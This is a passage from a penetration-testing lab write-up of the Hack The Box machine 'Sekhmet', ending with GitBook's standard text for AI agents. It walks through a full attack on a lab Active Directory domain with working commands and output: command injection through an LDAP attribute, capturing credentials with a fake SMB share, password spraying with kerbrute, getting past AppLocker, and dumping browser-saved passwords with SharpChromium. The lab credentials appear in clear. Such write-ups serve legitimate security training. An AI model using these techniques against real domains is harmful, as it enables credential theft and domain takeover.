modifying entry "CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb"
```

i can verify it by going to the WC-Share to check again if it modified or not

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCIXGmDTUGlV7PMTsbxi9%2Fimage.png?alt=media&amp;token=97e3b725-9352-44fd-b677-95c5a28d76cb" alt=""><figcaption></figcaption></figure>

And its modified. so we have a write access with that said i want to see if i can run any system commands through the mobile attribute.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fj7aczIctEpWzkZVRSOcG%2Fimage.png?alt=media&amp;token=882f1b4c-7b40-4cab-a965-932f9e3797b7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9Puv77hqV9IYIYa85Y9p%2Fimage.png?alt=media&amp;token=70d01ba0-a491-46ac-9250-4859f58a8abe" alt=""><figcaption></figcaption></figure>

Current user is Scriptrunner. I have command injection.

so i will try to capture the NTLM hash of script user to connect to my fake smb share on my attack machine.

For which i will setup listener on the ligolo to route traffic to my attack machine from the DC.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfGTG6BySqnkk5qQtzCvz%2Fimage.png?alt=media&amp;token=d39a3d27-4d38-42b6-b50b-a6e9d0502420" alt=""><figcaption></figcaption></figure>

Next setup the fake smb share.

```bash
┌──(ajay㉿kali)-[~]
└─$ sudo impacket-ntlmrelayx -smb2support -of hashes.txt
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in reflection mode
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay enabled
[*] Servers started, waiting for connections
[*] (SMB): Received connection from WINDCORP/scriptrunner at HOPE, connection will be relayed after re-authentication
[]
[*] (SMB): Connection from WINDCORP/SCRIPTRUNNER@10.10.15.204 controlled, attacking target smb://10.10.15.204:445
[*] (SMB): Received connection from WINDCORP/scriptrunner at HOPE, connection will be relayed after re-authentication
[*] (SMB): Authenticating connection from WINDCORP/SCRIPTRUNNER@10.10.15.204 against smb://10.10.15.204:445 SUCCEED [1]
[]
[*] (SMB): Connection from WINDCORP/SCRIPTRUNNER@10.10.15.204 controlled, attacking target smb://10.10.15.204:445
[-] smb://WINDCORP/SCRIPTRUNNER@10.10.15.204 [1] -> SMB SessionError: code: 0xc000035c - STATUS_NETWORK_SESSION_EXPIRED - The client session has expired; so the client must re-authenticate to continue accessing the remote resources.
```

```bash
dn: CN=Ray Duncan,OU=Development,DC=windcorp,DC=htb
changetype: modify
replace: mobile
mobile: $(gci \\webserver.windcorp.htb\share)

```

i will run the above code to capture the NTLM hash.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUCApgSqNHsYbWL48Mvne%2Fimage.png?alt=media&amp;token=1435761c-728a-4465-a65c-2f33f38aeb1b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiTsgI3tO8dd9COy2AiJB%2Fimage.png?alt=media&amp;token=55b43026-f107-4adf-b9eb-2a06449f89e4" alt=""><figcaption></figcaption></figure>

`scriptrunner : !@p%i&J#iNNo1T2`

Getting tgt as scriptrunner and searching through ldapsearch reveals that scriprunner is not part of any groups.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fh1UfcMGk4aMhNygIKAcd%2Fimage.png?alt=media&amp;token=ccb2bb8e-9a06-4f2d-8b44-e7f1c281615b" alt=""><figcaption></figcaption></figure>

so i cant get shell as script runner and is waste of use.

the next thing i can do is check if any users use the same password as ray.duncan or scriptrunner, for this i need to enumerate all the users i can get that through ldapsearch.

```bash
──(ajay㉿kali)-[~]
└─$ ldapsearch -H ldap://hope.windcorp.htb -b "DC=WINDCORP,DC=HTB" "(&(objectClass=user)(!(objectClass=computer)))" sAMAccountName | grep "^sAMAccountName:"
SASL/GSS-SPNEGO authentication started
SASL username: scriptrunner@WINDCORP.HTB
SASL SSF: 256
SASL data security layer installed.
sAMAccountName: Administrator
sAMAccountName: Guest
sAMAccountName: krbtgt
sAMAccountName: Carmen.Rogers
sAMAccountName: Henry.Holt
sAMAccountName: Albert.James
sAMAccountName: Bob.Wood
sAMAccountName: Shawn.Clark
sAMAccountName: Mark.Mitchell
sAMAccountName: Florence.Allen
sAMAccountName: Isaac.May
sAMAccountName: Maddison.Matthews
sAMAccountName: Patrick.Silva
sAMAccountName: Laurie.Prescott
sAMAccountName: Benjamin.Hernandez
sAMAccountName: Luis.Jackson
sAMAccountName: Beverley.Williams
sAMAccountName: Patricia.Howard
sAMAccountName: Angela.Bates
sAMAccountName: Sebastian.Weaver
sAMAccountName: Jamie.Silva
<SNIP>
```

sanitize the users file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaZNpA9wBwhfmpVcxYAUw%2Fimage.png?alt=media&amp;token=8e667e17-266c-45e5-844f-c3dd1aa7b851" alt=""><figcaption></figcaption></figure>

now i can try to password spray using kerbrute.

### Kerbrute to passwod spray

```bash
┌──(ajay㉿kali)-[~]
└─$ kerbrute -users clean_users.txt -password '!@p%i&J#iNNo1T2' -domain windcorp.htb -dc-ip 192.168.0.2
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

*] Valid user => Mae.Bishop
[*] Valid user => Darryl.Woods
[*] Valid user => Carmen.Rogers
[*] Valid user => Henry.Holt
[*] Valid user => Albert.James
[*] Stupendous => Bob.Wood:!@p%i&J#iNNo1T2
[*] Saved TGT in Bob.Wood.ccache
[*] Valid user => Shawn.Clark
[*] Valid user => Mark.Mitchell
<SNIP>
```

there bob wood uses the same password as scriptrunner.

`Bob.Wood : !@p%i&J#iNNo1T2`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7Kl7IlGupEp1Kue3ATGA%2Fimage.png?alt=media&amp;token=8ba6c21f-da05-49f6-8010-78685f614b76" alt=""><figcaption></figcaption></figure>

Bob wood is part of Domain Admins, this means i have shell access on DC.

## Shell as Bob.Wood

```bash
┌──(ajay㉿kali)-[~]
└─$ export KRB5_CONFIG=/home/ajay/custom_krb5.conf
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ kinit Bob.Wood@WINDCORP.HTB
Password for Bob.Wood@WINDCORP.HTB: 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ klist                      
Ticket cache: FILE:Bob.Wood.ccache
Default principal: Bob.Wood@WINDCORP.HTB

Valid starting       Expires              Service principal
06/13/2026 16:53:19  06/13/2026 20:53:19  krbtgt/WINDCORP.HTB@WINDCORP.HTB
        renew until 06/13/2026 20:53:19

(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=Bob.Wood.ccache

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fbd6k9iB4tTHGLzXwkvaG%2Fimage.png?alt=media&amp;token=abe467cc-1853-4c4e-a446-693892200411" alt=""><figcaption></figcaption></figure>

The next thing i have done is to transfer winpeas on to the machine and enumerate the host.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfMbCU0xS5CZ0dSrUlhXp%2Fimage.png?alt=media&amp;token=cc7aeba4-9022-4219-b57a-6a6b417749a6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDwKrUhXjmAwH0DfJK2hH%2Fimage.png?alt=media&amp;token=04deb50a-421f-46fe-bda2-e900db453610" alt=""><figcaption></figcaption></figure>

but running winpeas is blocked by applocker policy.

### Viewing Applocker Policy

```bash
*Evil-WinRM* PS C:\Users\Bob.Wood\Desktop> Get-AppLockerPolicy -Effective | Format-List

Version             : 1
RuleCollections     : {0, 0, 0, 0...}
RuleCollectionTypes : {Appx, Dll, Exe, Msi...}

*Evil-WinRM* PS C:\Users\Bob.Wood\Desktop> 
```

```bash
*Evil-WinRM* PS C:\Users\Bob.Wood\Desktop> Get-AppLockerPolicy -Effective -Xml | Out-File C:\Users\Bob.Wood\Desktop\policy.xml
*Evil-WinRM* PS C:\Users\Bob.Wood\Desktop> cat policy.xml
<AppLockerPolicy Version="1"><RuleCollection Type="Appx" EnforcementMode="Enabled"><FilePublisherRule Id="a9e18c21-ff8f-43cf-b9fc-db40eed693ba" Name="(Default Rule) All signed packaged apps" Description="Allows members of the Everyone group to run packaged apps that are signed." UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*"><BinaryVersionRange LowSection="0.0.0.0" HighSection="*" /></FilePublisherCondition></Conditions></FilePublisherRule></RuleCollection><RuleCollection Type="Dll" EnforcementMode="Enabled"><FilePublisherRule Id="5b74e91f-e7d9-4348-a21b-047d2901c659" Name="Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" Description="" UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" ProductName="*" BinaryName="*"><BinaryVersionRange LowSection="*" HighSection="*" /></FilePublisherCondition></Conditions></FilePublisherRule><FilePathRule Id="a6651628-328a-4beb-9ff3-7c94e84b0ff4" Name="Microsoft Windows DLLs" Description="Allows members of the Everyone group to load DLLs located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions><Exceptions><FilePathCondition Path="C:\Windows\Registration\CRMLog:*" /><FilePathCondition Path="C:\W
<SNIP>
```

i can copy the xml file to my machine and view it in the browser.

{% embed url="<https://gist.github.com/mattifestation/5f9de750470c9e0e1f9c9c33f0ec3e56>" %}

Found this windows world writable directories from which c:\windows\debug\wia is not blocked in the applocker list so i can be able to run winpeas from there.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F49NYcbSe5R5NexUiBdfB%2Fimage.png?alt=media&amp;token=c47ab3b4-5511-41d2-be4a-19c1990985a5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYwogWI4NteerKPX8PiKF%2Fimage.png?alt=media&amp;token=f22028bd-8263-4011-870a-5f717bea8346" alt=""><figcaption></figcaption></figure>

winPEAS identified master keys and  said there is no credential file but there is Edge browser on the machine. One good tool called sharp chromium can be able to use to extract keys from browsers like chrome, edge.

### Sharp Chromium to extract cookies from browser

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1vpZbkdAXMEZu84P8n1D%2Fimage.png?alt=media&amp;token=116218e7-bb76-4c6b-8ae8-a0593d9bc58e" alt=""><figcaption></figcaption></figure>

```bash
*Evil-WinRM* PS C:\Windows\Debug\wia> ./SharpChromium.exe logins
[*] Beginning Edge extraction.

--- Chromium Credential (User: Bob.Wood) ---
URL      : <http://somewhere.com/action_page.php>
Username : bob.wood@windcorp.htb
Password : SemTro32756Gff

--- Chromium Credential (User: Bob.Wood) ---
URL      : <http://google.com/action_page.php>
Username : bob.wood@windcorp.htb
Password : SomeSecurePasswordIGuess!09

--- Chromium Credential (User: Bob.Wood) ---
URL      : <http://webmail.windcorp.com/action_page.php>
Username : bob.woodADM@windcorp.com
Password : smeT-Worg-wer-m024

[*] Finished Edge extraction.

[*] Done.
*Evil-WinRM* PS C:\Windows\Debug\wia> 
```

got creds for `bob.woodADM`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgHnlXwUYlbLK2DDcND1W%2Fimage.png?alt=media&amp;token=709bffa8-a4cd-404d-b0da-10fe6d31e069" alt=""><figcaption></figcaption></figure>

i can get shell as `bob.woodADM`.

## Shell as Bob.woodADM

```bash
─(ajay㉿kali)-[~]
└─$ export KRB5_CONFIG=~/custom_krb5.conf
                                                                                                                    
┌──(ajay㉿kali)-[~]
└─$ kinit bob.woodADM@WINDCORP.HTB 
Password for bob.woodADM@WINDCORP.HTB: 
                                                                                                                    
┌──(ajay㉿kali)-[~]
└─$ klist                         
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: bob.woodADM@WINDCORP.HTB

Valid starting       Expires              Service principal
06/13/2026 18:06:47  06/13/2026 22:06:47  krbtgt/WINDCORP.HTB@WINDCORP.HTB
        renew until 06/13/2026 22:06:47
                                                                                                                    
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKMONJ8eUo13uINq9LW0o%2Fimage.png?alt=media&amp;token=d12fa2b2-43be-4a56-a1ab-59e3ec8a8bef" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPoUqsyXFcJWvAAUsxvp6%2Fimage.png?alt=media&amp;token=cd50e779-99b7-48de-82b4-49f6d79778e2" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-sekhmet.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
